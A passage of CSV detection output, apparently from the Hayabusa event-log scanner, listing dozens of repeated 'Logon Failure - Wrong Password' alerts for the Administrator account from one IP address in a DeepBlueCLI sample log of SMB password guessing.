Password,User: Administrator | Type: 3 | Computer: 11ylyxQyV5HCJ18g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.322 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Am2qI1ya4wYdqErV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.374 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2AmZsYUYmDpWZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.421 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c0Hd8xWxOxFifJBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.461 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlh64Gtfoig2uzOY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.522 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LtK8Hj2kf3dfFSnW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.562 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VKUPqxtNqkVqXgTg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.605 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SKSxp87CBg8L8wSi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CpvxvR0ftQs1gdEF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.684 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9RGDzNMt9fM6rLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.730 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvOO9NLhbbKJXQq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.777 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mDB9bIx7LcoJ6IAU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.822 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfJWsGqlQTmFUUPT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.869 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9PRIO3MASsjrdQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.906 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9QCn4nZHB0ENeA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.961 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4iUNHB1gE2d1dBfZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.001 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tM3IdtrLdVXQjOjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.051 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dbmn9Er9e1JZZybc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.102 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SY40ARcAoo9cWQIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.139 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fc7m0blzidQfn1BU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.193 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13SkGPbDDXou7qLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.235 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YIlJeZpJlvcKgqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.277 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BRhH6atcwLcGmrB4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.324 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGIInLsy4UCfl0oW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.372 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qJ7nEN0u9DkVuVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.413 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6qb85lEENmrj4ebF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.487 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6RXAj26rnxMmxuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.533 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tas7cqRNGQw6FlVX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.597 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQlF8GYIeWytFLsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.649 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dj48ftx52s1HntRT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.710 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B46vTS9PxUgUblBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.770 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoIFbywJEC0QaceV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.817 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSXqaP0i1eeKQOmX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.874 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gke4vfzIAC3k0yXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.919 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZnjxfeIX4ra6vmBA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.963 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ChR30FLLOT3Pvapv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.006 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VkepVf00vkpVp9yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5i2AxYxwCX6DvP3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.110 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8Fvcw2mQBI61mxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.156 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAazyOpBig2G3Z78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.197 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1g3rjPQQAXEK2yz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.245 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BC68zrAEF6L00xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.294 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8xD2aZArxVdrO6fG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.392 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHJN2mJgwQEZhXBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.441 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: untyxmsmYrfRlHcu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.486 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eOc2R5V6p9VBsYI2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.547 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5Ld2NDMjbY3tiT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.596 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ykdbglaCU82nRvk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.644 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tDGrsVIC5qVEwC6i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.686 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UouNQa3EkcsMICiO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.733 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u0exIftdu0qPLrRC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.776 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q5mMNIdJj0BItrv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.824 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb2cVBffdBlwwGQP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.852 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p2FbHoSFFdnM4wH7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.917 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RAbCN4xKDDlhmrkU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:25.973 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxBwuSDdNZlE2F96 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.021 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M3JkwIQF7yV42rOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.062 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6QiHHeHeY8yWOiJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.097 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rhzpo2bEgpJCB51w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.145 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuyPyMMT4wQhLIEz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.194 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no5bOZf3SEsrETun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.236 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBTHVleOipnyVFIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.284 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JNFE2jNifGI7pELk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.336 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LgkAKJ57rYqCdbew | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.385 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daKQcllU63lW4ypy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.426 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBSPSAoEBS7JRYuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.469 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94bI5pb8CGjY3QZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.525 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1obedLuMFlHlSvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.577 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EPn1yJV358YAFALV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.625 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qA7N5DMAJqNYkumM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.663 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Lk95NYGG5iLBFBw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.709 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3DDtXECsK61pIYy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.754 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rt8bfBDTV5wYfBO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.797 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uTYMgN5kmFpyj7xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.845 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmyF6j61wosCE0sg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.879 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fd61fJBRizl2AIGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:26.924 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDIFX7lsmGqSGvkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.037 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVmto6S25gU2bkwa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:27.115 